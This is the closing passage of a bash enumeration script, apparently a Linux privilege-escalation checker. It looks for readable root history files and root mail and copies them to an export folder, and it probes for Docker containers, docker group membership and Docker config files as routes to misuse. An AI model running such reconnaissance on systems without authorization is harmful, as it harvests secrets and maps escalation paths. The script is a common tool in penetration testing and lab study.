1203 | if [ "$roothist" ]; then 1204 | echo -e "\e[00;33m***Root's history files are accessible!\e[00m\n$roothist" |tee -a $report 2>/dev/null 1205 | echo -e "\n" |tee -a $report 2>/dev/null 1206 | else 1207 | : 1208 | fi 1209 | 1210 | if [ "$export" ] && [ "$roothist" ]; then 1211 | mkdir $format/history_files/ 2>/dev/null 1212 | cp $roothist $format/history_files/ 2>/dev/null 1213 | else 1214 | : 1215 | fi 1216 | 1217 | #is there any mail accessible 1218 | readmail=`ls -la /var/mail 2>/dev/null` 1219 | if [ "$readmail" ]; then 1220 | echo -e "\e[00;31mAny interesting mail in /var/mail:\e[00m\n$readmail" |tee -a $report 2>/dev/null 1221 | echo -e "\n" |tee -a $report 2>/dev/null 1222 | else 1223 | : 1224 | fi 1225 | 1226 | #can we read roots mail 1227 | readmailroot=`head /var/mail/root 2>/dev/null` 1228 | if [ "$readmailroot" ]; then 1229 | echo -e "\e[00;33m***We can read /var/mail/root! (snippet below)\e[00m\n$readmailroot" |tee -a $report 2>/dev/null 1230 | echo -e "\n" |tee -a $report 2>/dev/null 1231 | else 1232 | : 1233 | fi 1234 | 1235 | if [ "$export" ] && [ "$readmailroot" ]; then 1236 | mkdir $format/mail-from-root/ 2>/dev/null 1237 | cp $readmailroot $format/mail-from-root/ 2>/dev/null 1238 | else 1239 | : 1240 | fi 1241 | 1242 | #specific checks - check to see if we're in a docker container 1243 | dockercontainer=`cat /proc/self/cgroup 2>/dev/null | grep -i docker 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null` 1244 | if [ "$dockercontainer" ]; then 1245 | echo -e "\e[00;33mLooks like we're in a Docker container:\e[00m\n$dockercontainer" |tee -a $report 2>/dev/null 1246 | echo -e "\n" |tee -a $report 2>/dev/null 1247 | else 1248 | : 1249 | fi 1250 | 1251 | #specific checks - check to see if we're a docker host 1252 | dockerhost=`docker --version 2>/dev/null; docker ps -a 2>/dev/null` 1253 | if [ "$dockerhost" ]; then 1254 | echo -e "\e[00;33mLooks like we're hosting Docker:\e[00m\n$dockerhost" |tee -a $report 2>/dev/null 1255 | echo -e "\n" |tee -a $report 2>/dev/null 1256 | else 1257 | : 1258 | fi 1259 | 1260 | #specific checks - are we a member of the docker group 1261 | dockergrp=`id | grep -i docker 2>/dev/null` 1262 | if [ "$dockergrp" ]; then 1263 | echo -e "\e[00;33mWe're a member of the (docker) group - could possibly misuse these rights!:\e[00m\n$dockergrp" |tee -a $report 2>/dev/null 1264 | echo -e "\n" |tee -a $report 2>/dev/null 1265 | else 1266 | : 1267 | fi 1268 | 1269 | #specific checks - are there any docker files present 1270 | dockerfiles=`find / -name Dockerfile -exec ls -l {} 2>/dev/null \;` 1271 | if [ "$dockerfiles" ]; then 1272 | echo -e "\e[00;31mAnything juicy in the Dockerfile?:\e[00m\n$dockerfiles" |tee -a $report 2>/dev/null 1273 | echo -e "\n" |tee -a $report 2>/dev/null 1274 | else 1275 | : 1276 | fi 1277 | 1278 | #specific checks - are there any docker files present 1279 | dockeryml=`find / -name docker-compose.yml -exec ls -l {} 2>/dev/null \;` 1280 | if [ "$dockeryml" ]; then 1281 | echo -e "\e[00;31mAnything juicy in docker-compose.yml?:\e[00m\n$dockeryml" |tee -a $report 2>/dev/null 1282 | echo -e "\n" |tee -a $report 2>/dev/null 1283 | else 1284 | : 1285 | fi 1286 | 1287 | echo -e "\e[00;33m### SCAN COMPLETE ####################################\e[00m" |tee -a $report 2>/dev/null 1288 | 1289 | #EndOfScript 1290 | --------------------------------------------------------------------------------